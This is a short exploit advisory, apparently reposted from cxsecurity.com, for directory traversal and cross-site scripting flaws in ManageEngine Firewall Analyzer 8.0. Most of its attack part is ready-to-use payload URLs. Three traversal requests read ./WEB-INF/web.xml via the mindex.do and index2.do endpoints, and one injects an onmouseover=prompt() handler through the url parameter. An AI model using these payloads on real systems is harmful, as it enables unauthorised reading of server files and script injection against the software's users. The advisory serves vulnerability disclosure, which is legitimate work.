ManageEngine Firewall Analyzer 8.0 Directory Traversal / XSS

2015.01.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-22

################################################################################################ # # # ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... # # ############################################################################################# Sobhan System Network & Security Group (sobhansys) ------------------------------------------------------- # Date: 2015-01-28 # Exploit Author: AmirHadi Yazdani (Sobhansys Co) # Vendor Homepage: http://www.manageengine.com/products/firewall/ # Demo Link: http://demo.fwanalyzer.com/ #Affected version: <= Build Version : 8.0 About ManageEngine Firewall Analyzer (From Vendor Site) : ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect, archive, analyze their security device logs and generate forensic reports out of it. -------------------------------------------------------- I'M hadihadi From Virangar Security Team special tnx to:MR.nosrati,black.shadowes,MR.hesy & all virangar members & all hackerz greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei spl:Z.Khodaee ------- exploit: Diretory Traversal : http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f XSS : http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d" ---- Sobhan system Co. Signal Network And Security Group (www.signal-net.net) E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top